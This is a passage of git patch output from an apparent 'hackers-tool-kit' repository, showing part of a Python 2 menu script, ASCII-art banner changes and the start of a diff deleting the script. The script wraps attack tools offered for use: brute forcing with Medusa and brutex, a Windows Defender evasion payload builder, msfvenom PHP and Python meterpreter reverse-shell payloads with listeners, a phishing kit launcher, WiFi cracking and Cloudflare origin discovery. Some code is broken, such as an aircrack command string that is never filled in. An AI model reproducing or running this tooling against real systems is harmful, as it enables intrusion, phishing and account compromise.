Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +#------------------# +#FIND HASH TYPE END# + + +#RESTART SCRIPT START# +#--------------------# +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +#------------------# +#RESTART SCRIPT END# + + +#MEDUSA AUTOMATED START# +#----------------------# +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +#--------------------# +#MEDUSA AUTOMATED END# + + +#WAF DETECTER START# +#------------------# +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +#----------------# +#WAF DETECTER END# + + +#CLOUDFLARE BYPASS START# +#-----------------------# +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +#---------------------# +#CLOUDFLARE BYPASS END# + + +#BRUTEFORCE ALL SERVICES ON WEB START# +#------------------------------------# +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +#----------------------------------# +#BRUTEFORCE ALL SERVICES ON WEB END# + + +#METERPRETER HELP MENU START# +#---------------------------# +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +#-------------------------# +#METERPRETER HELP MENU END# + + +#WINDOWS DEFENDER BYPASS START# +#-----------------------------# +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +#---------------------------# +#WINDOWS DEFENDER BYPASS END# + + +#USE A EXPLOIT START# +#-------------------# +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +#-----------------# +#USE A EXPLOIT END# + + +#PHISHING AUTOMATED START# +#------------------------# +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +#----------------------# +#PHISHING AUTOMATED END# + + +#LIST DATABASE INFO START# +#------------------------# +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +#----------------------# +#LIST DATABASE INFO END# + + +#ALL METASPLOIT EVASIONS START# +#-----------------------------# +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +#---------------------------# +#ALL METASPLOIT EVASIONS END# + + +#FULLY UPDATE YOUR OS START# +#--------------------------# +def upgrade(): + os.system("apt update && apt upgrade") +#------------------------# +#FULLY UPDATE YOUR OS END# + + +#USE A NMAP SCRIPT START# +#-----------------------# +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +#---------------------# +#USE A NMAP SCRIPT END# + + +#GET HOST SSH VERSION START# +#--------------------------# +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +#------------------------# +#GET HOST SSH VERSION END# + + +#USE PROXYCHAINS FOR WEB START# +#-----------------------------# +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +#---------------------------# +#USE PROXYCHAINS FOR WEB END# + + +#GET HOST MYSQL VERSION START# +#----------------------------# +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +#--------------------------# +#GET HOST MYSQL VERSION END# + + +#CONNECT TO A HOST START# +#-----------------------# +def connect(): + h = raw_input("Enter Host: ") + print "\n" + print " How would you like to connect?" + print "---------------------------------------" + print "ssh: Secure Shell | Default Port = 22" + print "---------------------------------------" + print "telnet: Network Virtual Terminal | Default Port = 23" + print "---------------------------------------" + j = raw_input("Select Protocol: ") + a = '{0} {1}'.format(j,h) + os.system(a) +#---------------------# +#CONNECT TO A HOST END# + + + +#OPEN NEW TERMINAL START# +#-----------------------# +def terminal(): + os.system("gnome-terminal") +#---------------------# +#OPEN NEW TERMINAL END# + + +#AIRCRACK-NG [WIFI HACK] AUTOMATED START# +#---------------------------------------# +def aircrack(): + b = raw_input(G+"BSSID: \033[0m") + e = raw_input(G+"ESSID: \033[0m") + w = raw_input(G+"Wordlist: \033[0m") + h = raw_input(G+"Handshake file: \033[0m") + os.system("iwconfig") + i = raw_input(G+"Interface: \033[0m") + a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' + os.system(a) +#-------------------------------------# +#AIRCRACK-NG [WIFI HACK] AUTOMATED END# + + +#GET SOURCE CODE OF WEB START# +#----------------------------# +def source(): + t = raw_input(B+"Target:\033[0m ") + print Y+"\nWould you like to save source code in a file?\n\033[0m" + q = raw_input(R+"[y/n]:\033[0m ") + if q == "n": + an = 'curl {0}'.format(t) + os.system(an) + if q == "y": + ay = 'curl {0} >> /root/{1}.txt'.format(t,t) + os.system(ay) + print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) +#--------------------------# +#GET SOURCE CODE OF WEB END# + + +#WEB DIRECTORY SCAN START# +#------------------------# +def dirscan(): + t = raw_input(B+"Target URL:\033[91m ") + print "\033[0m" + a = 'dirb {0}'.format(t) + os.system(a) +#----------------------# +#WEB DIRECTORY SCAN END# + + + +#APACHE SERVER START# +#-------------------# +def aserver(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + print Y+"Starting Server\033[0m..." + os.system("service apache2 start") + br = raw_input(G+"Browser: \033[0m") + a = '{0} {1}'.format(br,ipaddr) + os.system(a) + stop = raw_input("hit enter to stop server: ") + print Y+"Stopping Server\033[0m..." + os.system("service apache2 stop") +#-----------------# +#APACHE SERVER END# + + +#CLEAR ALL START# +#---------------# +def clearall(): + os.system("clear") +#-------------# +#CLEAR ALL END# + + +#RUN A FILE START# +#----------------# +def run(): + print Y+"what program do you want to run the file with Example: python" + p = raw_input(N+"Program: ") + print "\n" + print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" + print "\n" + f = raw_input("Enter File: ") + print "\n" + print Y+"would you like to add arguments when running the file [y/n]\033[0m" + yn = raw_input(G+"[y or n]: \033[0m") + if yn == "n" : + a = '{0} {1}'.format(p,f) + os.system(a) + if yn == "y" : + arg = raw_input("Enter Arguments: ") + a = '{0} {1} {2}'.format(p,f,arg) + os.system(a) +#--------------# +#RUN A FILE END# + + +#REFRESH BANNER START# +#--------------------# +def banner(): + os.system("clear") + mainbanner() +#------------------# +#REFRESH BANNER END# + + +#PHP PAYLOAD START# +#-----------------# +def phpload(): + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> phpload.rc') + os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') + os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) + os.system('echo "exploit\n" >> phpload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r phpload.rc') + os.system('rm -rf phpload.rc') + if yn == "n": + os.system('echo " "') +#---------------# +#PHP PAYLOAD END# + + +#PYLOAD START# +#------------# +def pyload(): + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> pyload.rc') + os.system('echo "set payload python/meterpreter/reverse_tcp\n" >> pyload.rc') + os.system('echo "set LHOST {0}\n" >> pyload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> pyload.rc'.format(lport)) + os.system('echo "exploit\n" >> pyload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r pyload.rc') + os.system('rm -rf pyload.rc') + if yn == "n": + os.system('echo " "') +#----------# +#PYLOAD END# + + +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# +#-------------------------------------------------------------------------------------------------# +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + mainbanner() + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@unkn0wn_bali\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arpspoof": + arpspoof() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + if x == "connect": + connect() + if x == "terminal": + terminal() + if x == "aircrack": + aircrack() + if x == "source": + source() + if x == "dirscan": + dirscan() + if x == "aserver": + aserver() + if x == "clearall": + clearall() + if x == "run": + run() + if x == "banner": + banner() + if x == "phpload": + phpload() + if x == "pyload": + pyload() + found = True +mainbanner() +main() +#-------------------------------------------------------------------------------------------------# +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From 899da027a74248919edcc2ad2d308d847c346547 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Mon, 20 May 2019 21:00:58 +0100 Subject: [PATCH 144/214] Delete skull.txt --- tools/skull.txt | 45 --------------------------------------------- 1 file changed, 45 deletions(-) delete mode 100644 tools/skull.txt diff --git a/tools/skull.txt b/tools/skull.txt deleted file mode 100644 index 3713f24..0000000 --- a/tools/skull.txt +++ /dev/null @@ -1,45 +0,0 @@ - /\ - /..\ - / .. \ - / .. \ - / .. \ - | :: | - | :: | - | :: | - | :: | - .o oOOOOOOOo | :: | OOOo - Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO - OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO - OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB' - `O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo - .OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO - OOOOO '"OOOOOOOOOOOOOOOO"` oOO - oOOOOOba. .adOOOOOOOOOOba .adOOOOo. - oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO - OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO - "OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO" - Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :` - : .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? . - . oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo - '%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO': - `$" `OOOO' `O"Y | `OOOO' o . - . . OP" :: | : o . - | :: | - | :: | - . | /\ | . - |\ | / \ | /| - | `-._ | / \ | _.-' | - \ `-._ |/ \| _.-' / - \ `-' `-' / - `-._ @tuf_unkn0wn _.-' - `-._ _.-' - `-.________.-' - |\\\V///A| - |\\V///A\| - |\V///A\\| - |V///A\\\| - |//A\\\V/| - |/A\\\V//| - |/A\\\V//| - _|_.----._|_ - |__________| From 873a6657d27189b25e1a377cf27973df5e6f894b Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Mon, 20 May 2019 21:01:14 +0100 Subject: [PATCH 145/214] Add files via upload --- tools/skull.txt | 45 +++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 45 insertions(+) create mode 100644 tools/skull.txt diff --git a/tools/skull.txt b/tools/skull.txt new file mode 100644 index 0000000..805cc55 --- /dev/null +++ b/tools/skull.txt @@ -0,0 +1,45 @@ + /\ + /..\ + / .. \ + / .. \ + / .. \ + | :: | + | :: | + | :: | + | :: | + .o oOOOOOOOo | :: | OOOo + Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO + OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO type ? + OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB' for help + `O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo + .OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO + OOOOO '"OOOOOOOOOOOOOOOO"` oOO + oOOOOOba. .adOOOOOOOOOOba .adOOOOo. + oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO + OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO + "OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO" + Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :` + : .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? . + . oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo + '%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO': + `$" `OOOO' `O"Y | `OOOO' o . + . . OP" :: | : o . + | :: | + | :: | + . | /\ | . + |\ | / \ | /| + | `-._ | / \ | _.-' | + \ `-._ |/ \| _.-' / + \ `-' `-' / + `-._ @tuf_unkn0wn _.-' + `-._ _.-' + `-.________.-' + |\\\V///A| + |\\V///A\| + |\V///A\\| + |V///A\\\| + |//A\\\V/| + |/A\\\V//| + |/A\\\V//| + _|_.----._|_ + |__________| From ebb496a4bfa6ff00284bb657d8845e208dd1d0c5 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sat, 25 May 2019 20:16:05 +0100 Subject: [PATCH 146/214] Delete htk.py --- htk.py | 2824 -------------------------------------------------------- 1 file changed, 2824 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index be93f7a..0000000 --- a/htk.py +++ /dev/null @@ -1,2824 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @unkn0wn_bali -#i do not give you permission to show / edit this script without my credit -#to ask questions or report a problem message me on instagram @unkn0wn_bali -""" - - - ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ -▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ -▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ -░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ -░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ - ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ - ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ - ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ - ░ ░ - - -""" -#this is the loading screen \ the imports START# -#----------------------------------------------# -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -#COLOR VARIABLES START# -#---------------------# -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -#-------------------# -#COLOR VARIABLES END# - -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @tuf_unkn0wn\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -#----------------------------------------------# -#this is the loading screen \ the imports END# - - -#MAIN STARTING BANNER START# -#--------------------------# -def mainbanner1(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def mainbanner2(): - print """ - type ? for help -\033[92m - ▄█ ▄█ ▄█ - ███ ███ ███ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███ ███ ███ - ███ ███ ███ - █▀ █▀ █▀ - - ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ - ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m - ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ - ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m - │ │ ││ ││───├┴┐│ │ - ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m -Created By @tuf_unkn0wn - """.decode('utf-8') -def mainbanner3(): - print """\033[91m - ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ - ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ - ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ - ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ - ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ - ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ - ░░ ░▒ ░ ░░ ░▒ ░ - ░ ░ ░ ░ - ░ ░ ░ ░ - \033[90m - - ████████████████████ - ██ ██\033[91m - ▒▒ ▒▒ - ░░ ░░ - ░ ░ - ░ ░\033[0m - -888 888 88888888888 888 d8P -888 888 888 888 d8P -888 888 888 888 d8P \033[1;36m -8888888888 888 888d88K -888 888 888 8888888b\033[0m -888 888 888888 888 888888 888 Y88b -888 888 888 888 Y88b -888 888 888 888 Y88b - Created By @tuf_unkn0wn On Instagram - type ? for help - """.decode('utf-8') -def mainbanner4(): - print P+""" - .S S. sdSS_SSSSSSbs .S S. - .SS SS. YSSS~S%SSSSSP .SS SS. - S%S S%S S%S S%S S&S - S%S S%S S%S S%S d*S - S%S SSSS%S S&S S&S .S*S - S&S SSS&S S&S S&S_sdSSS - S&S S&S S&S S&S~YSSY%b - S&S S&S S&S S&S `S% - S*S S*S S*S S*S S% - S*S S*S S*S S*S n& - S*S S*S S*S S*S wS& - SSS S*S S*S S*S 0 SS - h SP SP SP n - a Y Y Y k - c n - k e r s - t o o l - k i t by @tuf_u\033[0m - - type ? for help - """.decode('utf-8') -def mainbanner5(): - print R+""" - ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ - ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ - ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ - ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ - ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ - ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ - ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ - ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ - ░\033[0m - .,,,,,,,,,,.,,,.....,........................... - ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, - ..,......,.....,,.,........,,...........,,.,.... - ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ - ***********************//***/***//**/********** - ****************** ****************** @tuf_unkn0wn - *,*****,*,******** ***,************** - **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** type ? for help - 